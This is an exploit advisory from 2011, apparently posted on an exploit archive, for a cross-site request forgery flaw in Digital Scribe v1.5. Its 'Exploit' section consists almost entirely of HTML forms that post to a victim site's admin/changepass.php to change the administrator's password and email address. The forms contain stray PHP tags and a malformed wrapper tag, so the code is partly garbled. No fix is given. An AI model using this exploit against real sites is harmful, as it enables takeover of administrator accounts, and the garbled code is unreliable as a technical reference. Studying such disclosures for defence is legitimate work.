Digital Scribe v1.5 CSRF Vulnerability

2011-12-11 09:15:15

Digital Scribe v1.5 CSRF Vulnerability

Author : Muhammet Cagri Tepebasili

Date : 11.11.2011

Script Homepage and Download : http://www.digital-scribe.org/

Version : 1.5

Tested on : Linux Mint 11

Exploit :


<fromtr>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/
changepass.php>
<BR>New Password: <INPUT TYPE=TEXT NAME=pass>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=submit VALUE="Update">
</form></td></tr></table>


<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/changepass.php>
<BR>New E-mail: <INPUT TYPE=TEXT NAME=emailad VALUE=<?php echo "$emailad";
?>>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=chng_email VALUE="Update">
</form></td></tr></table>
</fromtr>

Greetz : Eymen Sen and Cafer K.Sezer

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.